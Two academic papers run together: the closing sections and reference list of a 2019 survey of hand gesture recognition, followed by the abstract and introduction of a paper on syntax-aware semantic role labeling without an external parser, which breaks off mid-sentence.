http://dx.doi.org/10.7717/peerj-cs.218 It is no doubt that hand gesture recognition is capable of enabling natural communication and intelligence into applications that humans use every day. Hand gesture recognition is employing the principle of perceptual computing and changing the methods of human computer interaction (HCI) making them less complex and more enjoyable. Applications such as home control systems, healthcare systems, gaming technologies, automobiles, televisions, home automations, and robotics are expected to be able to use hand gesture recognition to represent the communication between the user and the devices (Hexa, 2017). Furthermore, some of the applications are very sensitive and in need of having a high recognition accuracy almost close to 100% to be able to use them without causing any damage or danger to human lives; such as applications of the health field, the transportation field, and the flight operation field. As hand gesture recognition was recently applied in some gaming consoles and has increased the sales rate of these consoles (such as Xbox and PlayStation), it is expected to keep growing more and more over time. Smartphones are expected to experience the highest growth of hand gesture recognition (Hexa, 2017). Smart televisions are also expected to experience a growth in this topic and increase the purchasing rate of the latest technology using hand gestures (Hexa, 2017). The topic is expected to grow over 28% from the year 2017 to 2024 (Hexa, 2017). CONCLUSIONS This paper had successfully presented the most prominent techniques, applications, and challenges in hand gesture recognition. These include the gesture acquisition methods, the feature extraction process, the classification of hand gestures, the applications that were recently proposed in the field of sign language, robotics and other fields, the environmental surroundings challenges and the datasets challenges that face researchers in the hand gesture recognition process, and the future of hand gesture recognition. The results of this paper can be summarized as the following; the surface electromyography (sEMG) sensors with wearable hand gesture devices were the most acquisition tools used in the works studied. Also, the Artificial Neural Network (ANN) was the most applied classifier, the most popular application was using hand gestures for sign language, the dominant environmental surrounding factor that affected the accuracy was the background color, and the common problem found in many of the studies was overfitting in the datasets. ADDITIONAL INFORMATION AND DECLARATIONS Funding The authors received no funding for this work. Competing Interests The authors declare there are no competing interests. Yasen and Jusoh (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.218 21/30 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.218 Author Contributions • Mais Yasen conceived and designed the experiments, performed the experiments, analyzed the data, contributed reagents/materials/analysis tools, prepared figures and/or tables, performed the computation work, authored or reviewed drafts of the paper, approved the final draft. • Shaidah Jusoh conceived and designed the experiments, contributed reagents/material- s/analysis tools, authored or reviewed drafts of the paper, approved the final draft. Data Availability The following information was supplied regarding data availability: The data used in the experiments of our research was collected from IEEE, and is available at Figshare: Yasen, Mais (2019): Literature.rar. figshare. Dataset. https: //doi.org/10.6084/m9.figshare.8158874.v1. A sample of the data is available in the Supplemental Files. Supplemental Information Supplemental information for this article can be found online at http://dx.doi.org/10.7717/ peerj-cs.218#supplemental-information. REFERENCES Aashni H, Archanasri S, Nivedhitha A, Shristi P, Jyothi SN. 2017. International confer- ence on advances in computing & communications. Science Direct 115:367–374. Adam K. 1994. Human gestures tools. In: Language and cognition in human evolution. Cambridge: Cambridge University Press. Adam K. 2004. Gesture: visible action as utterance. Cambridge: Cambridge University Press. Aditya T, Bertram T, Frederic G, Didier S. 2017. A probabilistic combination of CNN and RNN estimates for hand gesture based interaction in car. In: International symposium on mixed and augmented reality ISMAR-adjunct. Piscatway: IEEE, 1–6. Alvi M, Fatema TJ, Mohammad AY. 2016. An efficient approach of training artificial neural network to recognize Bengali Hand Sign. In: International conference on advanced computing IACC. Piscatway: IEEE, 152–157. Ananta S, Piyanuch S. 2016. Artificial neural networks for gesture classification with inertial motion sensing armbands. In: 10 conference TENCON. Piscatway: IEEE, 1–5. Ananya C, Anjan Kumar T, Kandarpa Kumar S. 2015. A Review on vision-based hand gesture recognition and applications. IGI Global 11:261–286. Ananyaa S, Ayush K, Kavleen K, Shivani J, Richa U, Sameer P. 2017. Vision based static hand gesture recognition techniques. In: International conference on communication and signal processing ICCSP. Piscatway: IEEE, 0705–0709. Andrea A. 2014. Advantages and drawbacks of gesture-based interaction. Computer Science—Miscellaneous 369514:1–11. Yasen and Jusoh (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.218 22/30 https://peerj.com https://doi.org/10.6084/m9.figshare.8158874.v1 https://doi.org/10.6084/m9.figshare.8158874.v1 http://dx.doi.org/10.7717/peerj-cs.218#supplemental-information http://dx.doi.org/10.7717/peerj-cs.218#supplemental-information http://dx.doi.org/10.7717/peerj-cs.218#supplemental-information http://dx.doi.org/10.7717/peerj-cs.218 Andrés GJ, Marco EB. 2017. Real-time hand gesture recognition with EMG using machine learning. In: Ecuador technical chapters meeting ETCM. Piscatway: IEEE, 1–5. Anna Y, Sung MC, Jae-Gon K. 2018. Detection and recognition of hand gesture for wear- able applications in IoMT. In: International conference on advanced communication technology ICACT. Piscatway: IEEE, 1–1. Anshal J, Heidy S, Emmanuel A. 2017. American sign language translation using edge detection and cross correlation. In: Colombian conference on communications and computing COLCOM. Piscatway: IEEE, 1–6. Arpita RS, Sanyal G, Majumder S. 2013. Hand gesture recognition systems: a survey. International Journal of Computer Applications 71:26–37. Ashish SN, Aarti GA. 2016a. Bilingual sign recognition using image based hand gesture technique for hearing and speech impaired people. In: International conference on computing communication control and automation ICCUBEA. Piscatway: IEEE, 1–6. Ashish SN, Aarti GA. 2016b. Sign language recognition using image based hand gesture recognition techniques. In: International conference on green engineering and technologies IC-GET. Piscatway: IEEE, 1–5. Atharva AK, Apurv DJ. 2017. Dynamic hand gesture recognition using Kinect. In: Innovations in power and advanced computing technologies i-PACT. Piscatway: IEEE, 1–3. Biyao S, Yifeng X, Hongnan Y, Yatong J, Chenggang Y, Hongtao X, Yangang W. 2017. a new dataset for hand gesture estimation. In: Global conference on signal and information processing globalSIP. Piscatway: IEEE, 1388–1392. Bradley LJ. 2015. It’s happening now: perceptual computing is real. Webopedia. Available at http://www.webopedia.com (accessed on 24 May 2018). Chenyang L, Xin Z, Lianwen J. 2017. LPSNet: a novel log path signature feature based hand gesture recognition framework. In: International conference on computer vision workshops ICCVW. Piscatway: IEEE, 631–639. Chenyang Z, Yingli T, Matt H. 2016. Multi-modality American sign language recog- nition. In: International conference on image processing ICIP. Piscatway: IEEE, 2881–2885. Chun-Jen T, Yun-Wei T, Song-Ling H, Ya-Chiu W. 2017. Synthetic training of deep CNN for 3D hand gesture identification. In: International conference on control. Artificial intelligence. Robotics & optimization ICCAIRO. Piscatway: IEEE, 165–170. Danling L, Yuanlong Y, Huaping L. 2016. Gesture recognition using data glove: an extreme learning machine method. In: International conference on robotics and biomimetics ROBIO. Piscatway: IEEE, 1349–1354. David VR, Donghan K. 2018. Hand gestures recognition using machine learning for control of multiple quadrotors. In: Sensors applications symposium SAS. Piscatway: IEEE, 1–6. Deepali NK, Chitode JS. 2012. Dynamic hand gesture recognition: a literature review. International Journal of Engineering Research & Technology 1:1–7 DOI 10.15623/ijret.2012.0101001. Yasen and Jusoh (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.218 23/30 https://peerj.com http://www.webopedia.com http://dx.doi.org/10.15623/ijret.2012.0101001 http://dx.doi.org/10.7717/peerj-cs.218 Deepali N, Milind K. 2016. Real time sign language recognition using the leap motion controller. In: International conference on inventive computation technologies ICICT, vol. 3. Piscatway: IEEE, 1–5. Devendrakumar HP, Kakade SM. 2016. Dynamic hand gesture recognition using kinect sensor. In: International conference on global trends in signal processing. Information computing and communication ICGTSPICC. Piscatway: IEEE, 448–453. Donq-Liang L, Wei-Shiuan Y. 2018. Recognition of complex static hand gestures by using the wristband-based contour features. IET Image Processing 12:80–87 DOI 10.1049/iet-ipr.2016.1139. Eko P, Surya S, Rafiidha SL. 2017. Classification of hand gesture in Indonesian sign language system using Naive Bayes. In: International seminar on sensors. Instrumen- tation. Measurement and metrology. Piscatway: IEEE, 187–191. Elecbits. 2019. Gesture control robotic vehicle. Available at http://www.elecbits.in/ product/gesture-control-robotic-vehicle (accessed on 14 May 2019). Erhan A, Hakan T, Baran U. 2017. Hand gesture classification using inertial based sensors via a neural network. In: International conference on electronics, circuits and systems. Piscatway: IEEE, 140–143. Fabian S, Thomas K, Alexander G, Uwe H. 2017. Free-hand gesture recognition with 3D-CNNs for in-car infotainment control in real-time. In: International conference on intelligent transportation systems ITSC. Piscatway: IEEE, 959–964. Fuchang Y, Hijian S. 2016. Research on static hand gesture recognition technology for human computer interaction system. In: International conference on intelligent transportation. Piscatway: IEEE, 459–463. Gunawardane PDSH, Nimali TM. 2017. Comparison of hand gesture inputs of leap motion controller & data glove in to a soft finger. In: International symposium on robotics and intelligent sensors IRIS. Piscatway: IEEE, 62–68. Hafız MA-R, Lehmia K, Danish Mirrani M, Noman Maraaj M. 2017. CMSWVHG- control MS Windows via hand gesture. In: International multi-topic conference INMIC. Piscatway: IEEE, 1–7. Haitham B, Alaa H, Sabah H. 2017. New method for optimization of static hand gesture recognition. In: Intelligent systems conference intellisys. Piscatway: IEEE, 542–544. Hang Z, Jiangping H, Yuping Z, Hong C. 2017. Hand gesture based control strategy for mobile robots. In: Chinese control and decision conference CCDC. Piscatway: IEEE, 5868–5872 DOI 10.1109/CCDC.2017.7978217. Hari PG, Haresh SC, Siddhartha M, Tanima D, Kulwant S. 2016. A continu- ous hand gestures recognition technique for human-machine interaction using accelerometer and gyroscope sensors. Sensors Journal 16:6425–6432 DOI 10.1109/JSEN.2016.2581023. Hexa R. 2017. Gesture recognition market analysis by technology 2D. 3D. By application tablets & notebooks. Smartphones. Gaming consoles. Smart televisions. In: Laptops & desktops and segment forecasts 2014–2024. Piscatway: IEEE, 1–100. Yasen and Jusoh (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.218 24/30 https://peerj.com http://dx.doi.org/10.1049/iet-ipr.2016.1139 http://www.elecbits.in/product/gesture-control-robotic-vehicle http://www.elecbits.in/product/gesture-control-robotic-vehicle http://dx.doi.org/10.1109/CCDC.2017.7978217 http://dx.doi.org/10.1109/JSEN.2016.2581023 http://dx.doi.org/10.7717/peerj-cs.218 Himadri NS, Shinjini R, Sudipta S, Sayan T, Suhrid KC. 2018. A machine learning based approach for hand gesture recognition using distinctive feature extraction. In: Computing and communication workshop and conference. Piscatway: IEEE, 91–98. Ibrahim A, Hashim A, Faisal K, Youngwook K. 2018. Hand gesture recognition using input impedance variation of two antennas with transfer learning. Sensors Journal 18:4129–4135. Isack B, Zhongfu Y, Jamal B. 2017. Higher-order local autocorrelation feature extraction methodology for hand gestures recognition. In: International conference on multime- dia and image processing ICMIP. Piscatway: IEEE, 83–87. Jakub T, Tomasz M, Piotr K. 2017. Influence of sEMG electrode matrix configuration on hand gesture recognition performance. In: Signal processing: algorithms, architectures, arrangements and applications SPA. Piscatway: IEEE, 42–47. Javier OPA, Paula CUM, Robinson JM. 2017. Convolutional neural network architecture for hand gesture recognition. In: International conference on electronics, electrical engineering and computing. Piscatway: IEEE, 1–6. Jessie RB, Dionis AP, Felicito SC, Janette CF, Carlos CH, Cyrel OM, Christine KSB, Ezra GF, Lanuelle TV. 2016. Sign language word translator using neural networks for the aurally impaired as a tool for communication. In: International conference on control system. Computing and engineering ICCSCE. Piscatway: IEEE, 425–429. Jiajun Z, Zhiguo S. 2017. Deformable deep convolutional generative adversarial network in microwave based hand gesture recognition system. In: International conference on wireless communications and signal processing WCSP. Piscatway: IEEE, 1–6. Jian Z, Jingna M, Guijin W, Huazhong Y, Bo Z. 2017. A miniaturized wearable wireless hand gesture recognition system employing deep-forest classifier. In: Biomedical circuits and systems conference. Piscatway: IEEE, 1–4. Jinxing Y, Jianhong P, Jun L. 2017. sEMG-based continuous hand gesture recognition using GMM-HMM and threshold model. In: International conference on robotics and biomimetics ROBIO. Piscatway: IEEE, 1509–1514. Jose C, Flores L, Gladys Cutipa AE, Lauro Enciso R. 2017. Application of convolutional neural networks for static hand gestures recognition under different invariant fea- tures. In: International conference on electronics, electrical engineering and computing. Piscatway: IEEE, 1–4. Jozef G, Slavomír K. 2017. Hand gesture recognition using 3D sensors. In: International symposium ELMAR. Piscataway: IEEE, 181–184. Karthik SK, Akash S, Srinath R, Shitij K. 2017. Recognition of human arm gestures using myo armband for the game of hand cricket. In: International symposium on robotics and intelligent sensors IRIS. 389–394. Kuang-Yow L, Chun-Chieh C, Yong-Jie H, Wen-Tsai S. 2017. Wearable armband for real time hand gesture recognition. In: International conference on systems, man and cybernetics. Piscatway: IEEE, 2992–2995. Lalit K, Pritee K. 2017. Vision-based mid-air unistroke character input using polar signatures. Transactions on Human-Machine Systems 47:1077–1088 DOI 10.1109/THMS.2017.2706695. Yasen and Jusoh (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.218 25/30 https://peerj.com http://dx.doi.org/10.1109/THMS.2017.2706695 http://dx.doi.org/10.7717/peerj-cs.218 Laura D, Angelo MS, Paolo D. 2008. A survey of glove-based systems and their applica- tions. IEEE Transactions on Systems, Man, and Cybernetics 38:461–480. Marco EB, Andrés GJ, Jonathan AZ, Andrés P, Víctor HA. 2017a. Hand gesture recognition using machine learning and the Myo armband. In: European signal processing conference. Piscatway: IEEE, 1040–1044. Marco EB, Cristhian M, Jonathan AZ, Andrés GJ, Carlos EA, Patricio Z, Marco S, Freddy BP, María P. 2017b. Real-time hand gesture recognition using the Myo armband and muscle activity detection. In: Second ecuador technical chapters meeting ETCM. Piscatway: IEEE, 1–6. Margaret R. 2016. Analytics tools help make sense of big data. AWS. Available at http: //searchbusinessanalytics.techtarget.com (accessed on 24 May 2018). Marlon O, Alistair S, Mohamed F. 2016. Two-stage PCA with interpolated data for hand shape recognition in sign language. In: Applied imagery pattern recognition workshop AIPR. 1–4. Meenakshi P, Pawan Singh M. 2011. Hand gesture recognition for human computer interaction. In: International conference on image information processing. Piscatway: IEEE, 1–7. Microsoft. 2019. Kinect gestures. Available at https://support.xbox.com/en-US/xbox- 360/accessories/body-controller (accessed on 14 May 2019). Moher D, Liberati A, Tetzlaff J, Altman DG. 2009. PRISMA group. Preferred reporting items for systematic reviews and meta-analyses: the PRISMA statement. PLOS Medicine 6:e1000097 DOI 10.1371/journal.pmed.1000097. Mohini G, Rohini R, Reddy PEVV, Bhanu Prakash P, Kumar KTPS. 2015. Gesture controlled metal detecting land rover. International Journal of Engineering Trends and Technology 21:229–232. Nabeel S, Rosa HM, Chan RHM. 2017. A wearable hand gesture recognition device based on acoustic measurements at wrist. In: International conference of the IEEE engineering in medicine and biology society EMBC. Piscatway: IEEE, 4443–4446 DOI 10.1109/EMBC.2017.8037842. Nilima MP, Patil SR. 2017. Review on real-time EMG acquisition and hand gesture recognition system. In: International conference of electronics. communication and aerospace technology ICECA. Piscatway: IEEE, 694–696. Oinam RC, Anushree P, Spandan S, Piyanka D. 2017. Comparative study for vision based and data based hand gesture recognition technique. In: International conference on intelligent communication and computational techniques. Piscatway: IEEE, 26–31. Oyndrila D, Puskar D, Sagnik M, Sayantan N, Tamal C, Sourav S. 2016. Computer vi- sion based framework for digit recognition by hand gesture analysis. In: Information technology, electronics and mobile communication conference IEMCON. 1–5. Peijun B, Ana IM, Carlos RD-B, Narciso G. 2017. Tiny hand gesture recognition without localization via a deep convolutional network. IEEE Transactions on Consumer Electronics 63:251–257. Yasen and Jusoh (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.218 26/30 https://peerj.com http://searchbusinessanalytics.techtarget.com http://searchbusinessanalytics.techtarget.com https://support.xbox.com/en-US/xbox-360/accessories/body-controller https://support.xbox.com/en-US/xbox-360/accessories/body-controller http://dx.doi.org/10.1371/journal.pmed.1000097 http://dx.doi.org/10.1109/EMBC.2017.8037842 http://dx.doi.org/10.7717/peerj-cs.218 Piotr K, Tomasz M, Jakub T. 2017. Towards sensor position-invariant hand gesture recognition using a mechanomyographic interface. In: Signal processing: algorithms, architectures, arrangements and applications SPA. Piscatway: IEEE, 53–58. Prashan P. 2014. Historical development of hand gesture recognition. In: Cognitive science and technology book series CSAT. Singapore: Springer, 5–29. Praveen KS, Shreya S. 2015. Evolution of hand gesture recognition: a review. Interna- tional Journal of Engineering and Computer Science 4:9962–9965. Qingrui Z, Mingqiang Y, Qinghe Z, Xinxin Z. 2017. Segmentation of hand gesture based on dark channel prior in projector-camera system. In: International conference on communications in China ICCC. Piscatway: IEEE, 1–6. Rafiqul ZK, Noor AI. 2012. Hand gesture recognition: a literature review. International Journal of Artificial Intelligence & Applications 3:161–174 DOI 10.5121/ijaia.2012.3412. Rajeshree R-S, Jayashree S. 2016. Dynamic hand gesture recognition. In: International conference on signal and information processing IConSIP. Piscatway: IEEE, 1–6. Rania AE, Mohammed SS, Mahmoud IA. 2017. Hand gesture recognition based on dimensionality reduction of histogram of oriented gradients. In: Japan-Africa conference on electronics, communications and computers JAC-ECC. Piscatway: IEEE, 119–122. Rasel AB, Abdul KT, Akm A, Jungpil S, Md Rashedul I. 2017. Reduction of gesture feature dimension for improving the hand gesture recognition performance of numerical sign language. In: International conference of computer and information technology ICCIT. Piscatway: IEEE, 1–6. Reshna S, Jayaraju M. 2017. Spotting and recognition of hand gesture for Indian sign language recognition system with skin segmentation and SVM. In: International conference on wireless communications, signal processing and networking WiSPNET. Piscatway: IEEE, 386–390. Rishabh S, Raj S, Nutan VB, Prachi RR. 2016. Interactive projector screen with hand detection using gestures. In: International conference on automatic control and dynamic optimization techniques ICACDOT. Piscatway: IEEE, 574–577. Riya B, Ankita B, Aradhya S, Tanu G, Ankush M. 2017. ISL gesture recognition using multiple feature fusion. In: International conference on wireless communications. Signal processing and networking WiSPNET. Piscatway: IEEE, 196–199. Rokhsana T, Ashfaq UR, Hasan UZ, Hafiz AR. 2017. A novel design of an intangible hand gesture controlled computer mouse using vision based image processing. In: International conference on electrical information and communication technology EICT. Piscatway: IEEE, 1–4. Rosalina , Lita Y, Nur H, Wahyu RB, Rusdianto R, Yuyu W. 2017. Implementation of real-time static hand gesture recognition using artificial neural network. In: 2017 4th International Conference on Computer Applications and Information Processing Technology (CAIPT). 1–6 DOI 10.1109/CAIPT.2017.8320692. Rytis A, Arunas L. 2017. Robust hand detection using arm segmentation from depth data and static palm gesture recognition. In: International conference on intelligent data Yasen and Jusoh (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.218 27/30 https://peerj.com http://dx.doi.org/10.5121/ijaia.2012.3412 http://dx.doi.org/10.1109/CAIPT.2017.8320692 http://dx.doi.org/10.7717/peerj-cs.218 acquisition and advanced computing systems: technology and applications. Piscataway: IEEE, 664–667. Salunke TP, Bharkad SD. 2017. Power point control using hand gesture recognition based on hog feature extraction and K-NN classification. In: International conference on computing methodologies and communication. Piscataway: IEEE, 1151–1155 DOI 10.1109/ICCMC.2017.8282654. Samata M, Kinage KS. 2015. Study on hand gesture recognition. International Journal of Computer Science and Mobile Computing 4:51–57. Shaun C, Walter K, Ryan M, Julie K, Tanner H, Lijun Y. 2017. Hand gesture recognition using a skeleton-based feature representation with a random regression forest. In: International conference on image processing ICIP. Piscataway: IEEE, 2364–2368. Shengchang L, Zonglong H, Haoyu T, Kai Y, Wenshuang Y. 2017. A hand gesture recognition system based on 24 GHz radars. In: International symposium on antennas and propagation ISAP. Piscataway: IEEE, 1–2. Shome SD. 2017. Detection of self intersection in synthetic hand pose generators. In: International conference on machine vision applications MVA. Piscataway: IEEE, 354–357. Shunzhan H, Chenguang Y, Min W, Long C, Zedong H. 2017. Hand gesture recognition using MYO Armband. In: Chinese automation congress CAC. Piscataway: IEEE, 4850–4855. Sih-Huei C, Ari H, Yuan-Shan L, Jia-Ching W. 2017. Hand gesture recognition based on Bayesian sensing hidden Markov models and Bhattacharyya divergence. In: International conference on image processing ICIP. Piscataway: IEEE, 3535–3539. Siji Rani S, Dhrisya KJ, Ahalyadas M. 2017. International conference on advances in computing. In: Communications and informatics ICACCI. Piscataway: IEEE, 1500–1505. Soukaina CM, Mohamed AM, Jamal R, Hamid T. 2018. Hand gesture recognition based on convexity approach and background subtraction. In: International conference on intelligent systems and computer vision ISCV. Piscataway: IEEE, 1–5. Soumya CV, Muzameel A. 2017. Artificial neural network based identification and classification of images of bharatanatya gestures. In: International conference on innovative mechanisms for industry applications ICIMIA. Piscataway: IEEE, 162–166. Srinidhi H, Ramakrishna P, Ramya H, Ehtesham H. 2016. GestAR: real time gesture interaction for AR with egocentric view. In: International symposium on mixed and augmented reality ISMAR-adjunct. Piscataway: IEEE, 262–267. Stefano S, Paolo MR, David AFG, Fabio R, Rossana T, Elisa C, Danilo D. 2018. On-line event-driven hand gesture recognition based on surface electromyographic signals. In: International symposium on circuits and systems ISCAS. Piscataway: IEEE, 1–5. Sungho S, Wonyong S. 2016. Dynamic hand gesture recognition for wearable devices with low complexity recurrent neural networks. In: International symposium on circuits and systems ISCAS. Piscataway: IEEE, 2274–2277. Takuya S, Xiaomeng G, Ehsan Y, Ashikur R, Olga B-L, Victor ML. 2017. Radar-based hand gesture recognition using I-Q echo plot and convolutional neural network. Yasen and Jusoh (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.218 28/30 https://peerj.com http://dx.doi.org/10.1109/ICCMC.2017.8282654 http://dx.doi.org/10.7717/peerj-cs.218 In: Conference on antenna measurements & applications CAMA. Piscataway: IEEE, 393–395. Vaibhavi SG, Akshay AK, Sanket NR, Vaishali AT, Shabnam SS. 2014. A review of various gesture recognition techniques. International Journal of Engineering and Computer Science 3:8202–8206. Vedha Viyas T, Willbert Baskar R, Simrose Gabriel N, Sanjive A. 2017. Hand pan- tomime apperception for robotic arm control. In: International conference of electronics, communication and aerospace technology ICECA. Piscataway: IEEE, 120–125. Vimonhak S, Aranya W, Somsak W. 2017. Hand gesture recognition for Lao alphabet sign language using HOG and correlation. In: 2017 14th International Conference on Electrical Engineering/Electronics, Computer, Telecommunications and Information Technology (ECTI-CON). Piscataway: IEEE, 649–651. Vivek DL, Ramesh M, Kagalkar . 2017. Methodology for real time hand gesture recog- nition and generating text description using histogram techniques. In: International conference on intelligent computing and control I2C2. 1–7. Vladislava B, Predrag T, Goran K. 2016. Hand gesture recognition using neural network based techniques. In: Symposium on neural networks and applications NEUREL. 1–4. Washef A, Kunal C, Soma M. 2016. Vision based hand gesture recognition using dynamic time warping for Indian sign language. In: International conference on information science ICIS. 120–125. Weiguo Z, Congyi L, Xin J, Peng L, Haoyao C, Yun-Hui L. 2017. Real-time implementa- tion of vision-based unmarked static hand gesture recognition with neural networks based on FPGAs. In: International conference on robotics and biomimetics ROBIO. Piscataway: IEEE, 1026–1031. Xi L, Chen L, Lihua T. 2017. Hand gesture recognition based on wavelet invariant moments. In: International symposium on multimedia ISM. Piscataway: IEEE, 459–464. Xiang G, Lei S, Qiang W. 2017. The design of robotic wheelchair control system based on hand gesture control for the disabled. In: International conference on robotics and automation sciences. Piscataway: IEEE, 30–34. Xinghao C, Hengkai G, Guijin W, Li Z. 2017. Motion feature augmented recurrent neu- ral network for skeleton-based dynamic hand gesture recognition. In: International conference on image processing ICIP. Piscataway: IEEE, 2881–2885. Yifan Z, Congqi C, Jian C, Hanqing L. 2018. EgoGesture: a new dataset and benchmark for egocentric hand gesture recognition. Transactions on Multimedia 20:1038–1050 DOI 10.1109/TMM.2018.2808769. Yiwen H, Jianyu Y, Zhanpeng S, Youfu L. 2017. Salient feature point selection for real time RGB-D hand gesture recognition. In: International conference on real-time computing and robotics RCAR. Piscataway: IEEE, 103–108. Yu Q, Zhiquan F, Xiaoyan Z, Xiaohui Y. 2017. Principle component analysis based hand gesture recognition for android phone using area features. In: International conference on multimedia and image processing ICMIP. Piscataway: IEEE, 108–112. Yasen and Jusoh (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.218 29/30 https://peerj.com http://dx.doi.org/10.1109/TMM.2018.2808769 http://dx.doi.org/10.7717/peerj-cs.218 Yuefeng L, Keshi H, Xueli S, Honghai L. 2016. Human-machine interface based on multi-channel single-element ultrasound transducers: a preliminary study. In: International conference on e-health networking. Applications and services healthcom. Piscataway: IEEE, 1–6. Yuhui Z, Shuo J, Peter BS. 2018. Wrist-worn hand gesture recognition based on barometric pressure sensing. In: International conference on wearable and implantable body sensor networks BSN. Piscataway: IEEE, 181–184. Yuntao M, Yuxuan L, Ruiyang J, Xingyang Y, Raza S, Samuel W, Ravi V. 2017. Hand gesture recognition with convolutional neural networks for the multimodal UAV control. Piscataway: IEEE, 198–203. Yuta S, Fumihiko N, Wataru K, Takashi K, Maki S. 2017. Behind the palm: hand gesture recognition through measuring skin deformation on back of hand by using optical sensors. In: Conference of the society of instrument and control engineers of Japan. Piscataway: IEEE, 1082–1087. Zengshan T, Jiacheng W, Xiaolong Y, Mu Z. 2018. WiCatch: a wi-fi based hand gesture recognition system access. IEEE Access 6:16911–16923. Zhiwen L, Xiaoxiao Y, Yanzhou G, Weixing H, Jian W, Guigang Z. 2017. A robust hand cursor interaction method using kinect. In: International symposium on multimedia ISM. Piscataway: IEEE, 543–548. Yasen and Jusoh (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.218 30/30 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.218 work_ql5liv4nfjah5lwcdnfg2r7ypm ---- Syntax-aware Semantic Role Labeling without Parsing Rui Cai and Mirella Lapata Institute for Language, Cognition and Computation School of Informatics, University of Edinburgh 10 Crichton Street, Edinburgh EH8 9AB Rui.Cai@ed.ac.uk mlap@inf.ed.ac.uk Abstract In this paper we focus on learning dependency aware representations for semantic role label- ing without recourse to an external parser. The backbone of our model is an LSTM- based semantic role labeler jointly trained with two auxiliary tasks: predicting the dependency label of a word and whether there exists an arc linking it to the predicate. The auxiliary tasks provide syntactic information that is specific to semantic role labeling and are learned from training data (dependency annotations) with- out relying on existing dependency parsers, which can be noisy (e.g., on out-of-domain data or infrequent constructions). Experimen- tal results on the CoNLL-2009 benchmark dataset show that our model outperforms the state of the art in English, and consistently improves performance in other languages, including Chinese, German, and Spanish. 1 Introduction Semantic role labeling (SRL) aims to identify the arguments of semantic predicates in a sen- tence and label them with a set of predefined relations (e.g., ‘‘who’’ did ‘‘what’’ to ‘‘whom,’’ ‘‘when,’’ and ‘‘where’’). Semantic roles capture basic predicate-argument structure while abstract- ing over surface syntactic configurations and have been shown to benefit a wide spectrum of applications ranging from machine translation (Aziz et al., 2011; Marcheggiani et al., 2018) to information extraction (Christensen et al., 2011) and summarization (Khan et al., 2015). The successful application of neural networks to a variety of NLP tasks (Bahdanau et al., 2015; Vinyals et al., 2015) has provided strong impetus to develop deep end-to-end models for SRL that forego the need for extensive feature engineering. Recently proposed models (Zhou and Xu, 2015; He et al., 2017; Marcheggiani et al., 2017) largely rely on bi-directional recurrent neural networks (Hochreiter and Schmidhuber, 1997) and predict semantic roles from textual input. They achieve competitive results while being syntax agnostic, thereby challenging conventional wisdom that parse trees provide a better form of representation for assigning semantic role labels (Johansson and Nugues, 2008). There are, however, good reasons why syntax ought to help semantic role labeling. First and foremost, SRL systems are trained on datasets whose semantic role annotations have been pro- duced on top of treebanked corpora, and as a re- sult are closely tied to syntactic information. An example sentence with roles labeled in the style of PropBank (Palmer et al., 2005) is shown in Figure 1. Here, many arcs in the syntactic depen- dency graph are mirrored in the semantic dependency graph, suggesting that syntactic dependencies could provide useful information to the SRL task. Secondly, predicates are typically associated with a standard linking, that is, a deterministic mapping from syntactic roles to semantic ones (Lang and Lapata, 2010; Surdeanu et al., 2008). For example, subject (SBJ) is commonly mapped onto A0, whereas A1 is often realized as object (OBJ). Even in cases where there is no canoni- cal mapping, dependency labels are still closely related to certain semantic roles, like the syntactic function TMP and the semantic role AM-TMP. The question of how to effectively incorporate syntactic information into sequential neural net- work models has met with different answers in the literature. Marcheggiani and Titov (2017) make use of graph convolutional networks (GCNs; Duvenaud et al., 2015; Kearnes et al., 2016; Kipf and Welling, 2017) as a means to represent syn- tax in neural models. GCNs are used to encode syntactic dependency trees in combination with encoders based on long short-term memory units 343 Transactions of the Association for Computational Linguistics, vol. 7, pp. 343–356, 2019. Action Editor: Alessandro Moschitti. Submission batch: 10/2018; Revision batch: 1/2019; Published 6/2019. c© 2019 Association for Computational Linguistics. Distributed under a CC-BY 4.0 license. Downloaded from http://www.mitpressjournals.org/doi/pdf/10.1162/tacl_a_00272 by Carnegie Mellon University user on 06 April 2021 Figure 1: Example sentence from the CoNLL-2009 English dataset annotated with syntactic dependencies (bottom) and semantic roles (top). (LSTMs). He et al. (2018) emphasize the role of syntax in argument identification rather than role labeling. Specifically, they develop an argument pruning algorithm that operates over dependency structures and selects argument candidates subject to a parameter determining their distance from the predicate. The predicate and its arguments are then encoded with an LSTM similar to Marcheggiani and Titov (2017). He et al. (2017) incorporate syntax at decoding time, in the form of constraints on the output structure (e.g., consistency with a parse tree is enforced by rejecting or penalizing arguments that are not constituents), whereas Strubell et al. (2018) incorporate syntactic infor- mation in a multi-task neural network model that simultaneously performs part-of-speech tagging, dependency parsing, predicate detection, and SRL. In this paper we argue that syntactic information is important for semantic role labeling and syn- tactic parsing is not. Despite recent advances in dependency parsing (Dozat and Manning, 2016; Kiperwasser and Goldberg, 2016), the use of an external parser often leads to pipeline-style architectures where errors propagate to later processing stages, affecting model performance. To mitigate such errors, Marcheggiani and Titov (2017) calculate a scalar gate for each edge in the dependency tree. And perhaps unsurprisingly, the performance of their system decreases when more than one GCN layer is stacked, as the effect of noisy information is amplified. Our key insight is to focus on dependency labels, which provide important information for semantic roles without requiring access to a full-blown syntactic representation of the sentence. Our model concentrates on the dependency structures pertaining to the predicate in a given sentence rather than capturing information relating to every arc in the dependency tree. The majority of arguments (approximately 68%) in the CoNLL- 2009 English development set are directly linked to the predicate or are predicates themselves. Our work focuses on learning dependency- aware representations without recourse to an ex- ternal parser. The backbone of our model is a semantic role labeler jointly trained with a de- pendency information extractor with two aux- iliary tasks: predicting the dependency label of a word and whether there exists an arc linking it to the predicate. The two auxiliary tasks pro- vide dependency information that is specific to the SRL task and is learned from training data (dependency annotations) without ever utilizing an external parser. Our model falls under the gen- eral paradigm of multi-task learning (Caruana, 1993) which aims to improve a main task by jointly learning one or more related auxiliary tasks. Multi-task learning has been successfully applied to various sequence-prediction tasks including chunking, tagging (Collobert et al., 2011b; Bjerva et al., 2016; 